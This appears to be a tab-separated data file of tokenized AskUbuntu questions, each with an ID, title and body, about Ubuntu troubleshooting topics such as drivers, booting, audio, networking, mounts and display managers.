441491	removing ax88179 driver	hi i have issued the following command to install the asix ax88179 driver : sudo make install su -c `` cp -v ax88179_178a.ko /lib/modules/3.8.0-37-generic/kernel/drivers/net/usb & & /sbin/depmod -a '' ax88179_178a.ko ' - > /lib/modules/3.8.0-37-generic/kernel/drivers/net/usb/ax88179_178a.ko' but the driver does not work as intended . how can i revert these changes ? thanks , dan
441492	overheating after upgrading to ubuntu 13.10	i recently upgraded from ubuntu 13.04 to ubuntu 13.10 and i notice that my dell inspiron laptop is heating more and also giving out more heat from fan side . below is the output of psensor http : //imgur.com/pkttvrw ps : couldnt upload image because of minimum reputation , so pasting link is this temperature normal and if not what should i do , maybe some issue with graphic drivers ? thank you
441493	moving from 12.04 to 14.04	i have a macbook with ubuntu 12.04 and macos , sharing a folder inside /home . i changed my uid in ubuntu into 501 , to have the same uid as the macos user . this works fine , but if i upgrade to 13.04 or 13.10 , i have the problem that after having changed the uid , i can not mount any device via usb with read/write permission . could anyone help me ? i want to upgrade only for gnome-shell 3.12/3.10 , which is impossible to install in a ubuntu 12.04 thank you
441499	( errno 113 ) no route to host	i have installed openstack following tutorial from here . when i run this command to authorize keystone -- os-token admin -- os-endpoint http : //192.168.1.6:5000/v2.0 tenant-list i get this error [ errno 113 ] no route to host here is a line from the log when i was installing openstack executing : keystone endpoint-create -- region region -- service_id=f3e5eb3144a24bd7b2d91f733827e1e8 -- publicurl=http : //192.168.1.6:5000/v2.0 -- internalurl=http : //127.0.0.1:5000/v2.0 -- adminurl=http : //127.0.0.1:35357/v2.0 how to solve this ?
441501	how to resize windows exactly in xfce ?	i was wondering if , in xfce ( my laptop is older and unity is slow ) it is possible to resize windows to exact pixel amounts ? e.g . let 's say i want a 501x504px window . is this possible ? even if the command line is needed . i need exact sizes for some training videos where i want to capture some windows . thanks !
441505	installing & running a python script on ubuntu	i have a ( most likely very stupid ) question to ask : i recently setup a fresh install of ubuntu 10.04 to use as an internal web server for some very basic tasks . i came across a python script that i want to serve up from this box . it 's a relatively basic script and i 'm sure a relatively basic process to serve it up from apache web server . i want to learn for the sake of learning . any/all help anyone can provide would be very appreciated . i guess it 's worth noting that i have complete and unrestricted access to this box . ( forgive me for doing this , but i have enabled root access cringe & shutter ) mcgonigiggle
441509	i ca n't seem to boot ubuntu properly	i recently installed ubuntu and once installed , i was greeted by a black screen only ( the terminal ) . when restarting i selected ubuntu and it still sent me back to the black screen again . i used to have windows 8 before i installed ubnutu so i 'm thinking maybe it 's win 8 causing it somehow . does anyone know what could be wrong ?
441511	kingoffice availability for ubuntu 12.04	is there a free version of kingoffice for ubuntu 12.04 ? if not , what are existing alternatives ?
441513	while installing ubuntu phone	while installing ubuntu phone i entered : sudo fastboot oem unlock it does n't read the device and printed : < waiting for device > on the terminal . note my device is genx gx pad 370 g with android version 4.1.1
441514	how do i permanently install refind onto my mac from ubuntu ( without using mac os )	i deleted my mac os and i had trouble getting my mac to recognize the ubuntu installer when i pressed the alt key on boot . i had to re-install mac os install refind and then install ubuntu again when it was recognized and delete mac os . how do i permanently install refind so that if i do an encrypted install or wiped the drive i could still use refind ? all of this from ubuntu ( i do n't want to reinstall mac os again ) . edit : here are the errors i found when i tried to change bootmgr error : i tried doing a manual install to efi/boot.bootx64.efi and it worked i think but i had some errors when i tried changing boot order : raj @ raj-macbookpro : ~ $ sudo efibootmgr -c -l \\efi\\refind\\refind_x64.efi -l refind [ sudo ] password for raj : ** warning ** : boot0002 has same label refind ** warning ** : boot0003 has same label refind bootcurrent : 0000 timeout : 5 seconds bootorder : 0004,0003,0002,0000,0080,0001 boot0000* ubuntu boot0001* refind boot manager boot0002* refind boot0003* refind boot0080* mac os x boot0081* mac os x boot0082* bootd1a6* ast bootffff* boot0004* refind raj @ raj-macbookpro : ~ $ efibootmgr -o 0001,0080,0081 boot entry 1 does not exist raj @ raj-macbookpro : ~ $ i 've tried many other versions of the efibootmgr command such as efibootmgr -o 1,80,81 but they have n't worked .
441515	which ubuntu version suits best my configuration ?	my sister has a netbook with this configration : lg x110-g.a7hbg weiss xp home atom n270 1.60ghz , 1gb ram , 160gb hdd , which ubuntu version should i install on it ? i already tried the current version 13.10 but it crashes often and i do n't want to repair it again and again . could you recommend the version which suits the above specs best ?
441516	how to replace corrupted ubuntu files so my installation works again ?	due to usb problems ubuntu 's files have been irrecoverably corrupted . however i was using session manager for chromium which has saved a multitude of browsing sessions that are very important for my business and it would be very tedious to start `` from scratch '' . i thought that installation replaces whatever is on disk with files that work together to make a working os so maybe it can replace the corrupted files with working ones without replacing my session manager sessions and other important files . ive used windows previously and ive had this situation once . i booted from installation dvd and selected something like `` repair windows '' if this is n't possible with ubuntu then at least tell me how to backup and restore session manager 's browsing sessions .
441519	blank screen ( black ) on trying to install ubuntu 13 through iscsi on a windows target	i am trying to install ubuntu 13 through iscsi on a windows target ( windows server 2012 ) . but after selecting the option 'install ubuntu'the screen just goes blank and nothing happens even after 5 minutes . the virtual disk in target contains pre-installed windows 2012 server os ( efi ) . can anyone help out on this issue ? thanks , kamini
441523	12.04.4 hangs at install	i am trying to install 12.04.4 on a dell precision m70 laptop . i wiped the disk clean and established 3 partitions - one formatted for root , one for swap and one ntfs . all are at least 30 gig . i have tried installing from a cd but it always hangs without getting far . i created a bootable usb stick and was able to get quite a way with it . it appears that the system is about 2/3 installed and says it is currently installing system but no progress was made overnight . i have gotten to this same point twice . there is no error message - just no progress . any ideas ?
441524	update the ui while threading	i am running an ssis package on a different thread than the ui thread . how do i update the ui with status information from the ssis package while it is running ? in other words , i would like to read the current status information on the package while it is running and update the ui to show the status . for example , the event 's listener for the ssis package will indicate the status ( in progress , complete ) and i want to show this status in the ui .
441528	opening flashgot interface	i 'm downloading some videos using flashgot in firefox . i want to see the download status , how much they are downloaded . but i ca n't open the interface of flashgot . how can i open the flashgot interface to view download sratus ? ?
441530	i changed my .xinitrc file and ca n't log into ubuntu , how to fix it ?	i use vim to build an empty file ~/.xinitrc as a tutorial tells me . and then i change its content to exec wmii . wmii is the window manager i intended to use . i 've already installed it on my ubuntu . after i reboot my computer , i ca n't log in with my account , flash up and back to the log in interface . but still i can log in with guest account . is there a way that i can fix this problem and log in with my account ?
441531	cryptsetup-encrypted disks failing after restart ( mb solved ? )	i am using cryptsetup/luks ( eta : on 12.04 ) to encrypt partitions on external hard drives . several times now , i 've had disks fail to mount after an apparently normal restart ( often a kernel upgrade , because that 's one of the few times i need to restart ) . ( this latest time was after the upgrade on march 31 , 2014 . ) the affected disks luksopen ok , but when i try to mount them i get : mount : wrong fs type , bad option , bad superblock on /dev/mapper/xyz1 , missing codepage or helper program , or other error in some cases useful info is found in syslog - try dmesg | tail or so looking in the syslog , i find : [ 431.185319 ] ext3-fs ( dm-1 ) : error : could n't mount because of unsupported optional features ( 240 ) also , an isluks call on the mapper device gives return value 1 . any idea what 's going on here , and ideally how i could recover the disks ? addendum : i finally thought to run luksdump on the original partition : version : 1 cipher name : aes cipher mode : cbc-essiv : sha256 hash spec : sha1 payload offset : 4096 mk bits : 256 mk digest : [ censored ] mk salt : [ censored ] [ censored ] mk iterations : 44500 uuid : [ censored ] key slot 0 : enabled iterations : 178040 salt : [ censored ] [ censored ] key material offset : 8 af stripes : 4000 key slot 1 : disabled key slot 2 : disabled key slot 3 : disabled key slot 4 : disabled key slot 5 : disabled key slot 6 : disabled key slot 7 : disabled eta : fdisk -l on the drive says : `` disk /dev/mapper/xyz1 does n't contain a valid partition table '' . so , after poking around the older ubuntu forums , i decided to try something basic : the drive was listed in fstab as `` ext3 '' . i changed that to `` ext4 '' . now it mounts . note that i had not changed fstab before the drive stopped working in the first place , it was listed as `` ext3 '' from the beginning . so i 'm not sure if this is a solution or a heisenbug ... .
441533	nsupdte problem	i 've used the `` pscp '' tool to transfer a text file from a java application running on windows machine to a ubuntu server one . i use this script to make a dynamic dns update . # ! /bin/bash nsupdate -v $ 1 and here is my text file server 192.168.1.18 debug yes zone rnu.tn update add isetcom.rnu.tn 604800 a 192.168.1.23 show send but when i make ./myscript mytextfile i got no error but also no query response and the update operation does not work . what is strange is that when i modify my text file by deleting something and then retyping it from the ubuntu machine it works . please can any one help me
441535	intel nuc wake from suspend with black screen	i am trying to get my intel nuc running a celeron processor with 13.10 to wake from suspend . when i press the power button i can hear the computer come to life but nothing activates on my screen ?
441537	i 'm trying to install some packages and i have dependencies issues , is my system broken ?	i 'm trying to install some packages , but the package manager ( apt-get , software center ) refuses to install them with a dependency issue . is my attempts to install the package that are causing the dependency issue ? how can i know if my system is not broken already ?
441539	installing ubuntu from usb - can not set hdd to bootable	i am trying to install ubuntu server 12.04 from usb on a clean system ( no os ) . i had no trouble booting from the usb and beginning installation following the installation guide ( sorry , newbie here ) . when i reach the point to partition the hdds is where the issue comes up . i am trying to install as raid1 on two identical wd 2tb hdds , i can follow all of the steps , except the usb drive is listed as hda and as primary , the two hdds are listed as hdb and hdc and i can not set as primary or as bootable . how can i make this change ? i was unable to attempt to set as primary , and when i would select bootable , it would immediately revert back . thank you very much , john
441541	partitions files not found after ubuntu install	after bootup problems with windows vista , i installed ubuntu 12.04 lts on my 32bit compaq presario . and now can not find any of my pre-existing window user files . think may have something to do with swap file . i ran lsblk with following results : name fstype size mountpoint label sda 149.1g ├─sda1 swap 138.1g └─sda2 ext4 10.9g / sr0 2k pretty sure sr0 is my cd with a blank cd installed in it .
441543	is there an rdp client that can work with a dual monitor setup ?	i have a windows hyper-v server setup . on the hyper-v server we have windows 7 pro 32 bit installed . on ubuntu it comes with remmina rdp client by default . i like the default rdp client , however i ca n't use two monitors with it . both monitors are installed on my ubuntu 13.10 32 bit system . both monitors work great inside ubuntu , i just need them both to work with an rdp client . is there any other rdp client that will work with two monitors ? or can i configure remmina to work with them both ?
441547	headphone jack intermittently working on asus a55vd with ubuntu 13.10	i have seen many posts about problems with headphone jacks on ubuntu and have even tried some of the solutions , however my issue seems to be slightly different in the fact that quite often my headphone socket works perfectly well . i have just re-booted ( in case this is part of the problem ) from windows 8 into linux , with my speakers plugged into my headphone jack . there is no sound coming out of the speakers . removing the jack plug for the external speakers switches to the internal speaker and i have sound . replacing the plug for the external speakers switches to the headphones ( in other words , it is being recognised ) but i have no sound . if i open the sound settings it offers me the option to test my speakers , and when i do gives no error , but no sound either . yesterday i was using the same system with the same speakers in the same context and i had sound , including swapping from windows to linux during the day . this happens about once a month , sometimes more . restarting pulseaudio and/or alsamixer has no effect . i reboot the system , sometimes two or three times , and maybe it resolves the issue , only to happen again a few weeks later . i have never had this issue in windows ( which leads me to believe it is a software , not a hardware issue ) . if anyone can suggest any configuration files i can post here to facilitate a response i would appreciate it and i will post them asap . it really seems though , that as far as pulseaudio and alsamixer are concerned , there is not a configuration problem , they both think that i am enjoying dylan at full volume .
441551	14.04 will not boot	installed 14.04 final beta , installed fine . on boot startscreen where you can choose comes up , after clicking on ubuntu screen turns purple with no activity , going to advanced options gives me a black screen and after some time a message that root timed out and could not find partitions ? installed with different hdd configurations ( like apart boot partition ) did not make a difference . test installed 13.10 no problems at all . could grub 2 be the problem ? thanks in advance
441555	mini net install freezes ( or severely slows downs ) after choosing keyboard , what to do ?	i made a net install ubuntu 13.10 cd for my mbp which is missing mac os x. i put it in and it worked until i enters keyboard layout . then it enters a purple page with a white input ( that seems much like a terminal input minus the terminal text ) . if i press enter it will go down . it does n't load anything after that . what do i do ?
441556	`sudo` asks for password even when i have no password set ?	i removed the password from my account using the `` user accounts '' window and then on running sudo , it prompted me for a password , even when i did n't have one . i tried pressing enter without entering anything but it did n't help . also i could n't unlock my account to set a new password in the `` user accounts '' window in `` system settings '' because it kept prompting for a password and would n't except an empty string , just like sudo . i then finally set a new password using passwd . is this a bug which should n't be happening ? how do i prevent this from happening ?
441560	problem for using playonlinux	i am using ubuntu 12.04 lts , so i have installed playonlinux in order to get ms office 2010 in my ubuntu . i have succeeded to get ms office 2010 , but my problem now is , when i open the 'dash home ' and click on the shortcut icon of word or powerpoint , it 's not responding and does not open . how to open the new installed office programs ?
441565	reusing old passwords	pam_cracklib module is capable of consulting a user 's password `` history '' and not allowing them to reuse old passwords . what security risk is in reusing old passwords ? if this work is useful , how many of password should be kept as history ?
441568	hdmi not waking after suspend	i am running an intel nuc with 13.10 . when i wake the computer after suspend the computer activates but hdmi does n't so i get no picture and end up manually having to reboot .
441569	jack - setting up the interface and audio outputs with onboard soundcard- how ?	i 'm trying to set up jack on my ubuntu 14.04 . i want to use my internal sound card ( usb audio interface is sent back for repair ) i have many options to choose for in the audio configuration , i tried a lot of combinations , but i will get stutter with bitwig studio . also in the console of jack there are always some errors , and xrun callback 17:42:05.508 patchbay deactivated . 17:42:05.510 statistics reset . 17:42:05.515 alsa connection change . 17:42:05.526 d-bus : service is available ( org.jackaudio.service aka jackdbus ) . 17:42:05.643 d-bus : jack server is starting ... can not connect to server socket err = no such file or directory can not connect to server request channel jack server is not running or can not be started can not connect to server socket err = no such file or directory can not connect to server request channel jack server is not running or can not be started 17:42:05.648 alsa connection graph change . 17:42:05.693 d-bus : jack server was started ( org.jackaudio.service aka jackdbus ) . mon mar 31 17:42:05 2014 : starting jack server ... mon mar 31 17:42:05 2014 : jack server starting in realtime mode with priority 10 mon mar 31 17:42:05 2014 : error : can not lock down 82274202 byte memory area ( can not allocate memory ) mon mar 31 17:42:05 2014 : acquired audio card audio2 mon mar 31 17:42:05 2014 : creating alsa driver ... hw : generic,0|hw : generic|256|2|44100|0|0|nomon|swmeter|-|32bit mon mar 31 17:42:05 2014 : configuring for 44100hz , period = 256 frames ( 5.8 ms ) , buffer = 2 periods mon mar 31 17:42:05 2014 : alsa : final selected sample format for capture : 32bit integer little-endian mon mar 31 17:42:05 2014 : alsa : use 2 periods for capture mon mar 31 17:42:05 2014 : alsa : final selected sample format for playback : 32bit integer little-endian mon mar 31 17:42:05 2014 : alsa : use 2 periods for playback mon mar 31 17:42:05 2014 : error : can not use real-time scheduling ( rr/10 ) ( 1 : operation not permitted ) mon mar 31 17:42:05 2014 : error : acquireselfrealtime error mon mar 31 17:42:05 2014 : graph reorder : new port 'system : capture_1' mon mar 31 17:42:05 2014 : new client 'system ' with pid 0 mon mar 31 17:42:05 2014 : graph reorder : new port 'system : capture_2' mon mar 31 17:42:05 2014 : graph reorder : new port 'system : playback_1' mon mar 31 17:42:05 2014 : graph reorder : new port 'system : playback_2' mon mar 31 17:42:05 2014 : graph reorder : new port 'system : playback_3' mon mar 31 17:42:05 2014 : graph reorder : new port 'system : playback_4' mon mar 31 17:42:05 2014 : graph reorder : new port 'system : playback_5' mon mar 31 17:42:05 2014 : graph reorder : new port 'system : playback_6' mon mar 31 17:42:07 2014 : saving settings to `` /home/nick/.config/jack/conf.xml '' ... 17:42:07.874 jack connection change . 17:42:07.875 server configuration saved to `` /home/nick/.jackdrc '' . 17:42:07.875 statistics reset . 17:42:07.880 client activated . 17:42:07.892 jack connection graph change . can not lock down 82274202 byte memory area ( can not allocate memory ) 17:42:07.908 xrun callback ( 1 ) . mon mar 31 17:42:07 2014 : new client 'qjackctl ' with pid 2433 17:42:09.892 xrun callback ( 47 skipped ) . 17:42:11.895 xrun callback ( 52 skipped ) . 17:42:13.898 xrun callback ( 57 skipped ) . 17:42:15.900 xrun callback ( 57 skipped ) . 17:42:17.902 xrun callback ( 46 skipped ) . 17:42:19.905 xrun callback ( 51 skipped ) . 17:42:21.907 xrun callback ( 55 skipped ) . 17:42:23.910 xrun callback ( 51 skipped ) . 17:42:25.913 xrun callback ( 53 skipped ) . 17:42:27.915 xrun callback ( 53 skipped ) . 17:42:29.928 xrun callback ( 53 skipped ) . 17:42:31.931 xrun callback ( 50 skipped ) . 17:42:33.937 xrun callback ( 46 skipped ) . 17:42:35.940 xrun callback ( 45 skipped ) . 17:42:37.943 xrun callback ( 52 skipped ) . 17:42:39.945 xrun callback ( 54 skipped ) . 17:42:41.947 xrun callback ( 51 skipped ) . 17:42:43.949 xrun callback ( 43 skipped ) . 17:42:45.952 xrun callback ( 41 skipped ) . 17:42:47.954 xrun callback ( 40 skipped ) . 17:42:49.956 xrun callback ( 48 skipped ) . 17:42:51.959 xrun callback ( 47 skipped ) . 17:42:53.961 xrun callback ( 48 skipped ) . 17:42:55.963 xrun callback ( 51 skipped ) . 17:42:57.966 xrun callback ( 45 skipped ) . 17:42:59.968 xrun callback ( 42 skipped ) . 17:43:01.970 xrun callback ( 50 skipped ) . 17:43:03.972 xrun callback ( 45 skipped ) . 17:43:05.974 xrun callback ( 49 skipped ) . 17:43:07.977 xrun callback ( 50 skipped ) . 17:43:09.979 xrun callback ( 49 skipped ) . 17:43:11.981 xrun callback ( 63 skipped ) . this is my motherboard which option do i need to choose for interface , and for the output ? i can choose from the interface drop down menu : *default hw generic hw generic 0 hw:0 plughw:0 /dev/audio /dev/dsp* at the second drop down menu of interface option : *hw generic hd-audio generic ( hw:2 ) hw generic,0 alc892 analog ( hw:2.0 ) default* and for the output device : *default hw generic hw generic 0 hw:0 plughw:0 /dev/audio /dev/dsp* and for the second drop down menu : *hw generic hd-audio generic ( hw:2 ) hw generic,0 alc892 analog ( hw:2.0 ) hw generic,1 alc892 digital ( hw:2.1 ) default* as driver i choose alsa . can somebody give me advice ? or is my sound card not good for this ? i want to use the jack out on the back of the pc for the speakers .
441570	ubuntu 13.10 - language toggle keys do n't work	i 've read some people have been having trouble with switching between languages and i 'm also experience something similar . in my case i can successfully change the key combination to switch languages and it works at first , however , after some time it no longer works . going to `` text entry settings '' there seems nothing wrong . i can fix it by re entering the desired key combination but again after some time it `` forgets it '' and no longer works . this is a fresh install of ubuntu 13.10 . any help appreciated . thanks
441572	wired external internet dropping intermittently	i recently installed ubuntu 13.10 ( later upgraded to 14.04 in an unsuccessful attempt to fix the problem ) and have been having trouble with the wired internet . specifically , the internet connection is dropping intermittently , maybe for 15-90 seconds every minute or two . curiously , i never have any problems pinging another computer plugged into the same switch . only the external internet drops . however , i do n't have any issues with the external internet when i plug my macbook into the same ethernet switch . it 's not a dns issue , as the issue persists if i try to ping google by ip address instead of using google.com . i actually have two network cards in the machine ( each with two ethernet ports ) . the cards use different drivers , namely e1000e and ixgbe . i encounter the same problem no matter which card i plug into . i was originally on ubuntu 13.10 and kernel 3.11 . i upgraded to ubuntu 14.04 and kernel 3.13.0-20 , but it did n't fix the problem . i also tried disabling the 3 interfaces ( two ports on the other card and the unused port on the active card ) and stopping network-manager , but that did n't seem to have an effect either . there 's nothing obvious in /var/logsyslog or kern.log . in particular , the times when the internet stops and starts again do n't lineup with dhcp renewals . any ideas ? i 'm stumped here , so any help would be very much appreciated . thanks !
441574	web client front end download manager	i currently run a headless server ( ubuntu server 12.10 ) with various applications running on the box accessed via web interfaces ( transmission , plex etc ) . the box sits at a site with a quick and serves the purpose of being a central file repository , torrent box . i was wondering if there was any application i could install on it which i could access via a web interface , password protected , which allowed me to punch in a file url and it could download that file to a predetermined folder ? something similar to the transmission client for ubuntu server but for files off the web ?
441576	firefox shows no text after installing cinnamon	i replaced my desktop environment with cinnamon . it is great except that the auto complete box in chrome and firefox appear with no text at all :
441577	wrong theme in kde	i am currently having a very strange problem with the kde widget style . the problem consists in that the widget styles are not respected . all windows appear with something that looks like the default gtk style ( i do n't know the name ) . if i change the style in systemsettings , the appearance for currently open windows change , but new windows continue to appear with the wrong style . this does not seem to be affected by which style i choose in the settings ( i have tested with oxygen , plastique and skulpture . also , i have confirmed that opening applications with the style set by the command line ( such as ksysguard -- style oxygen ) does work . i have not found any information whatsoever in the internet about this ( probably because all the results are about kde-gtk engines , which this is not about . i do n't know if this has to do with any of it , but this is happening ever since upgrading from 13.04 to 13.10 . edit : to clarify , here goes screenshots : if i simply open any kde program , i get this ( rename file dialog from a dolphin instance ) , which is not the oxygen style i set it to : if i go to system settings- > application appearance- > style , set any option ( i.e . changing an option and immediately reverting it , just so the apply button will be enabled , i get the following appearance ( correct style ) . this also happens when i launch a program with the style set by command line ( -- style oxygen ) .
441578	mounting partition	i am new to ubuntu . i installed it on 750gb harddisk . my problem is that i am not able to access the sda2 partition of my disk . below is the output of sudo fdisk -l : disk /dev/sda : 750.2 gb , 750156374016 bytes 255 heads , 63 sectors/track , 91201 cylinders , total 1465149168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x8b61adb8 device boot start end blocks id system /dev/sda1 * 2048 200002047 100000000 83 linux /dev/sda2 200003582 1465147391 632571905 5 extended partition 2 does not start on physical sector boundary . /dev/sda5 1452797952 1465147391 6174720 82 linux swap / solaris /dev/sda6 200003584 1452797951 626397184 83 linux partition table entries are not in disk order
441580	how to get rid of youtube html5 player from firefox	i have tried youtube html5 player by opting it in from here but i dont find html5 youtube player as good as flash player . so i opted out from same link despite of opt-out youtube was showing videos in html5 . i tried deleting cookies deleting firefox profile deleting .mozila directory from home uninstalling and reinstalling firefox but still problem persist and it is really annoying . meanwhile i installed chrome and i am getting flash player in chrome but no luck in firefox . please help me . thanks
441586	why is my wifi so slow ?	i have an alienware m14x-r2 laptop that i use with dual-booting windows 7 / ubuntu . in windows 7 i have no problems with it at all , but i do n't have any of my important software set up in windows so i need to run ubuntu most often . since i only have problems in ubuntu , the rest of this post is assuming i 'm in ubuntu . sometimes when i boot , the wifi connects well enough and everything is fast and nice like it should be with transfers around 10 mbit/s . but most often , wifi is really slow from the moment i start . i have n't been able to establish why it is fast sometimes and super-slow most of the time . the one fix that i found so far has been to reboot the computer until i get into a mode where wifi is fast , and then crazy fast type commands to get requests going outwards to the internet , throw up chrome , establish a stream to a site like twitch.tv or similar , and when the connection is kept constantly active like this after reboot then it is always fast after that . because of this , i thought it might be some power-saving thing , so i ran this command : sudo iwconfig wlan0 power off but that does n't do anything . i tried spamming the command many times , but it never seems to do anything . so if it is a power-saving `` feature '' then i need to find a different way of turning it off , and turning it off forever . i never want anything power-saving activated , of any form . i have lots of battery time on my laptop and i really do n't need any power-saving `` features '' that only work to slow my computer down . if i run only `` iwconfig '' then i get this output : mode : managed frequency:2.467 ghz access point : 30:85 : a9:69:8e:00 bit rate=72.2 mb/s tx-power=14 dbm retry long limit:7 rts thr : off fragment thr : off power management : off link quality=70/70 signal level=-27 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:4070 invalid misc:94 missed beacon:0 please help , this is extremely frustrating . thank you . ps . if you have a suggestion that might help , then please also help me get it every time the computer starts , so i do n't have to go to the terminal every time . edit : the output of iwconfig changes over time . the change is in bit rate , which goes from 6 mb/s to 7.2 to 14.4 etc over various values . is there a way to lock this to a specific speed ( i.e . 72.2 mb/s ) ?
441590	problem while watching movies or clips ubuntu 13.10 nvidia drives ?	hi guys i have a problem i hope you can help me with . i just installed ubuntu 13.10 on my asus n76vz laptop and am dual booting it with windows 7 . so i have problems when i am watching a fhd movie or clip in youtube . while the clip is going , from time to time i see some strange lines that cut the picture in half . so i tried to install nvidia drives and i had a black screen and then reinstall everything and i still have problems with movies and clips . can you tell me why does it happen or how can i repair it ? thanks !
441594	starting x as a normal user	i am only able to launch startx as the root user , but i would like to run it as a normal user instead , because apparently xrdp wo n't let me open a remote session when x is running as root . every time i try to launch startx as a normal user it immediately crashes saying that the exiting process has been successful ( haha , how funny ) . this is what i have tried doing so far : changing the owner of .xauthority to my user deleting all .xauthority-related files adding my user to the video group reconfiguring xorg uninstalling and reinstalling xorg setting permission to launch x to anybody in /etc/x11/xwrapper.config all to no avail , i can still only run startx as root . i am running ubuntu 12.04 server .
441597	how to change the destiny owner on a bind mounting point	sudo mount -o user=www-data , group=www-data -- bind /home/chachan/workspace/ /var/www sudo mount -o owner=www-data , group=www-data -- bind /home/chachan/workspace/ /var/www chachan @ magento : ~ $ sshfs chachan @ 192.168.56.1 : /home/chachan/workspace/magento /home/chachan/workspace chachan @ magento : ~ $ sudo mount -o owner=www-data , group=www-data -- bind /home/chachan/workspace/ /var/www chachan @ magento : ~ $ ls -lh /var/www total 700k -rw-r -- r -- 1 chachan chachan 2.8k nov 26 10:44 api.php drwxr-xr-x 1 chachan chachan 4.0k nov 26 10:44 app -rw-r -- r -- 1 chachan chachan 2.8k nov 26 10:44 cron.php -rw-r -- r -- 1 chachan chachan 717 nov 26 10:44 cron.sh drwxr-xr-x 1 chachan chachan 4.0k nov 26 10:44 downloader drwxr-xr-x 1 chachan chachan 4.0k nov 26 10:44 errors -rw-r -- r -- 1 chachan chachan 1.2k nov 26 10:44 favicon.ico -rw-r -- r -- 1 chachan chachan 5.9k nov 26 10:44 get.php drwxr-xr-x 1 chachan chachan 4.0k nov 26 10:44 includes -rw-r -- r -- 1 chachan chachan 2.6k nov 26 10:44 index.php -rw-r -- r -- 1 chachan chachan 2.4k nov 26 10:44 index.php.sample -rw-r -- r -- 1 chachan chachan 6.3k nov 26 10:44 install.php drwxr-xr-x 1 chachan chachan 4.0k nov 26 10:44 js drwxr-xr-x 1 chachan chachan 4.0k nov 26 10:44 lib -rw-r -- r -- 1 chachan chachan 11k nov 26 10:44 license_afl.txt -rw-r -- r -- 1 chachan chachan 11k nov 26 10:44 license.html -rw-r -- r -- 1 chachan chachan 11k nov 26 10:44 license.txt -rw-r -- r -- 1 chachan chachan 1.3k nov 26 10:44 mage drwxr-xrwx 1 chachan chachan 4.0k mar 31 09:33 media -rw-r -- r -- 1 chachan chachan 886 nov 26 10:44 php.ini.sample drwxr-xr-x 1 chachan chachan 4.0k nov 26 10:44 pkginfo -rw-r -- r -- 1 chachan chachan 572k nov 26 10:44 release_notes.txt drwxr-xr-x 1 chachan chachan 4.0k nov 26 10:44 shell drwxr-xr-x 1 chachan chachan 4.0k nov 26 10:44 skin drwxr-xrwx 1 chachan chachan 4.0k nov 26 10:44 var i want to have www-data : www-data as owner : group in the above list of files . any idea what am i missing or doing wrong ? . thanks
441600	confusion of space allocation /home and /home	i recently got a new w8 computer and followed this tutorial to get ubuntu installed in dual boot . this is what my file system looks like : device directory total /dev/sda6 / 45gbib /dev/sda2 /boot/efi 356mib /dev/sda7 /home 874.3gib now , i was going about my data science stuff and downloaded a 12gb file , and un-zipped it . i start getting errors saying that i do not have enough memory . i know i have ~1tb allocated to linux . all i can tell is that i was working in /home/myusername assuming that that 's where most of my space was allocated , but it seems as though ~800gb are in /home . since i 'm new to linux i 'm a little confused . any ideas on how to go about this ? should i just start using /home or is there a proper way to reallocate space ?
441607	on kubuntu , ubuntu software center gets ssl handshake failed	when try to get a package got this message : unable to load page problem occurred while loading the url https : //apps.ubuntu.com/cat/tos/plain/ ssl handshake failed
441608	black screen while installing ubuntu 12.04 lts	i have a low-end hcl laptop config : intel core 2 duo processor,2gb ram with a standard vga graphics . right now i 'm using windowsxp as my main os . i 'm new to ubuntu and i want to install ubuntu 12.04 lts as my main os . i already formatted my c drive and when i try to install ubuntu , it goes well on start but after i click `` try ubuntu '' or `` install ubuntu '' it shows ubuntu 12.04 . . . and then appears a black screen . i waited for 1hour , nothing happens . i tried booting with cd and usb . no use . and also tried every options in f6 mode . im gettin the same error do i have to format my whole hard disk before installing ubuntu ? please someone help .
441610	internationalization of qml application using i18n	does someone know all the steps needed to have the apps translated in multiple languages ? i am using in my qml files i18n.tr ( ) , and such words i need to translate i performed below steps ( ~/qtcreator/owndictionary is project directory ) , but the apps is always in english : roman @ roman-ubuntu : ~/qtcreator/owndictionary $ mkdir locale roman @ roman-ubuntu : ~/qtcreator/owndictionary $ xgettext -c -- qt -- keyword=tr -- add-comments=translators owndictionary.qml -p locale -o messages.pot roman @ roman-ubuntu : ~/qtcreator/owndictionary $ ls locale messages.pot roman @ roman-ubuntu : ~/qtcreator/owndictionary $ cd locale/ roman @ roman-ubuntu : ~/qtcreator/owndictionary/locale $ msginit -i messages.pot -o sk.po -- i edited here the sk.po to add slovak translation roman @ roman-ubuntu : ~/qtcreator/owndictionary/locale $ msgmerge -u sk.po messages.pot roman @ roman-ubuntu : ~/qtcreator/owndictionary/locale $ mkdir -p sk/lc_messages -- in manifest.json i found such line : `` name '' : '' com.ubuntu.developer.username.owndictionary '' , so i executed this : roman @ roman-ubuntu : ~/qtcreator/owndictionary/locale $ msgfmt sk.po -o sk/lc_messages/com.ubuntu.developer.username.owndictionary.mo maybe some special environment settings are needed as well ?
441611	what 's the proper way to restart x or lightdm on the command line via upstart ?	i want to restart the display manager ( lightdm in my case , on ubuntu 13.10 ) on the command line . what 's the proper way to do it ? sudo /etc/init.d/lightdm restart from a terminal emulator does n't work , i 'm guessing because the process is killed when the display manager is stopped . looking at the /etc/init.d/lightdm script , the `` restart '' mode just runs /etc/init.d/lightdm stop , then /etc/init.d/lightdm start . is this expected behavior ? what does work is going to a virtual terminal ( ctrl+alt+f1 ) and running sudo /etc/init.d/lightdm restart . however , this does n't correctly restart in the case where lightdm has already been stopped , because of the set -e in the lightdm script , which causes it to exit when the start-stop-daemon fails to stop the ( already stopped ) process . set -e ... ssd_start_args= '' -- pidfile $ pidfile -- name $ ( basename $ daemon ) -- startas $ daemon -- -d '' ssd_stop_args= '' -- pidfile $ pidfile -- name $ ( basename $ daemon ) -- retry term/5/term/5 '' case `` $ 1 '' in ... restart ) [ -f $ pidfile ] & & /etc/init.d/lightdm stop [ -f $ pidfile ] & & exit 1 /etc/init.d/lightdm start ; ; stop ) log_daemon_msg `` stopping x display manager '' `` lightdm '' if ! [ -f $ pidfile ] ; then log_progress_msg `` not running ( $ pidfile not found ) '' else start-stop-daemon -- stop -- quiet $ ssd_stop_args ssd_res= $ ? if [ $ ssd_res -eq 1 ] ; then log_progress_msg `` not running '' fi if [ $ ssd_res -eq 2 ] ; then log_progress_msg `` not responding to term signals '' else if [ -f $ pidfile ] ; then log_progress_msg `` ( removing stale $ pidfile ) '' rm 